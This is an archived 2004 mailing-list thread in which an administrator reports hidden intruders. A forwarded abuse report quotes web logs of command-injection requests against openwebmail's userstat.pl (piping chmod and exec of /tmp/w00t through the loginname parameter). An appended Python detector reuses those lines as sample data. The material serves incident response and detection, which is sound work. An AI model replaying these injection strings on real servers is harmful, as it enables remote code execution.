[linux-network] Re: who command

---------

From: İBRAHİM DEMİREL (idemirel@biko.biz)
Date: Mon 21 Jun 2004 - 14:00:11 EEST


C:\Documents and Settings\Administrator>tracert 194.27.44.15

Tracing route to student.mku.edu.tr [194.27.44.15]
over a maximum of 30 hops:
    . ............ ................. .................
    . ............ ................. .................
    . ............ ................. .................
    . ............ ................. .................
  5 109 ms 105 ms 105 ms 195.175.18.158
  6 123 ms 122 ms 118 ms 193.140.0.110
  7 122 ms 118 ms 118 ms student.mku.edu.tr [194.27.44.15]

Trace complete.

It must be someone connecting from Mustafa Kemal University, or someone who has a
[legal | illegal] account there. Maybe this will be useful to you.....

----- Original Message -----
From: "Latife ZEYTXNELX" <lyolac@mku.edu.tr>
To: <linux-network@liste.linux.org.tr>
Sent: Monday, June 21, 2004 1:33 PM
Subject: [linux-network] who command

> Hello,
> When I run who I see only myself; even though I am root, I cannot see the
> other users. What could be causing this?
> I suspect that someone has gotten into the system.
> When I run last I see only myself,
> yet there are people connecting from other places and I cannot see them,
> and messages keep coming from syslogd:
> someone has opened a session under a different name.
> Could you please help with this urgently?
> Good luck with your work.
> Also, this message arrived:
> Dear Sir/Madame,
> This Saturday (190604) somebody tried to gain root privileges on a
> server in our serverpark. According to the log facility it was somebody
> out of your ip space.
> First he tried to gain shell access by misusing some openwebmail bug and
> then he tried to exploit the kernel with a local kernel exploit. We have
> also found a script, it looks like there is some sort of daemon
> listening on 194.27.44.15 who is waiting for connections from the
> script, maybe some sort of autorooter/worm.
> I hope you could have a look at this matter asap.
>
> Kind Regards,
>
> GrafiX Internet B.V.
> Marcel Haman
>
> access_log.1:194.27.44.15 - - [19/Jun/2004:14:12:40 +0200] "GET
> /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t
> HTTP/1.0" 200 151
> access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:41 +0200] "GET
> /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0"
> 200 -
> access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:53 +0200] "GET
> /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t
> HTTP/1.0" 200 151
> access_log.1:194.27.44.15 - - [19/Jun/2004:14:17:55 +0200] "GET
> /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0"
> 200 151
> access_log.1:67.166.132.228 - - [19/Jun/2004:20:48:08 +0200] "GET
> /cgi-bin/formmail.pl?email=f2%40aol%2Ecom&subject=www%2Emaffiafeest%2
> Ecom%
> 2Fcgi%2Dbin%2Fformmail%2Epl&recipient=cgiscanner%40mail%2Enu&msg=w00t
>
> HTTP/1.1Content-Type: application/x-www-form-urlencoded" 400 299
> ------- End of Forwarded Message -------


---------
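The requests quoted in the forwarded abuse report carry a leading `|` in the `loginname` parameter. As an added example (not part of the original messages), the Python below scans access-log records for query values that contain shell metacharacters after percent-decoding. The sample records are constructed from the quoted log with the mail quoting and wrapping removed, plus one benign request (`192.0.2.10`, `alice`) added for contrast.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: two records in the shape quoted in the abuse report
# (mail quoting and line wrapping removed) and one benign request for contrast.
SAMPLE_LOG = """\
194.27.44.15 - - [19/Jun/2004:14:12:40 +0200] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|chmod%20755%20/tmp/w00t HTTP/1.0" 200 151
194.27.44.15 - - [19/Jun/2004:14:17:41 +0200] "GET /cgi-bin/openwebmail/userstat.pl?loginname=|exec%20/tmp/w00t HTTP/1.0" 200 -
192.0.2.10 - - [19/Jun/2004:15:01:02 +0200] "GET /cgi-bin/openwebmail/userstat.pl?loginname=alice HTTP/1.0" 200 151
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) \S+$'
)
# Characters that a shell, or a script handing the value to a shell, treats specially.
SHELL_META = re.compile(r'[|;&`$<>\n]')


def suspicious_requests(log_text):
    """Return one finding per query parameter whose decoded value has shell metacharacters."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # wrapped or malformed records need manual review
        url = urlsplit(m["target"])
        # parse_qsl splits on '&' first and then percent-decodes each value.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if SHELL_META.search(value):
                findings.append({
                    "client": m["client"],
                    "when": m["when"],
                    "path": url.path,
                    "param": name,
                    "value": value,  # percent-decoded form
                    "status": int(m["status"]),
                })
    return findings


if __name__ == "__main__":
    for f in suspicious_requests(SAMPLE_LOG):
        print(f'{f["when"]} {f["client"]} {f["path"]} '
              f'{f["param"]}={f["value"]!r} -> {f["status"]}')
```

The status code only shows that the server answered the request; whether the command actually ran has to be established on the host itself.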

This archive was generated by hypermail 2.1.7.